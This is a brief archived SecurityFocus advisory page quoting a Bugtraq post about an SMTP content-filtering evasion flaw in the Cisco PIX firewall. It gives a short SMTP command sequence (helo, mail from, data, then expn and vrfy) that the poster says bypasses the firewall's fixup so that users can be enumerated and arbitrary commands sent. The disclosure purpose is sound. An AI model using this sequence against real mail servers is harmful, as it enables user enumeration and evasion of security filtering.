Cisco PIX Firewall SMTP Content Filtering Evasion Vulnerability

From naif <>'s Bugtraq post:

Here an example of what i could do exploiting this bug:
helo ciao
mail from:
data ( From here pix disable fixup)
expn guest ( Now i could enumerate user
vrfy oracle and have access to all command)
whatever command i want


Privacy Statement
Copyright 2010, SecurityFocus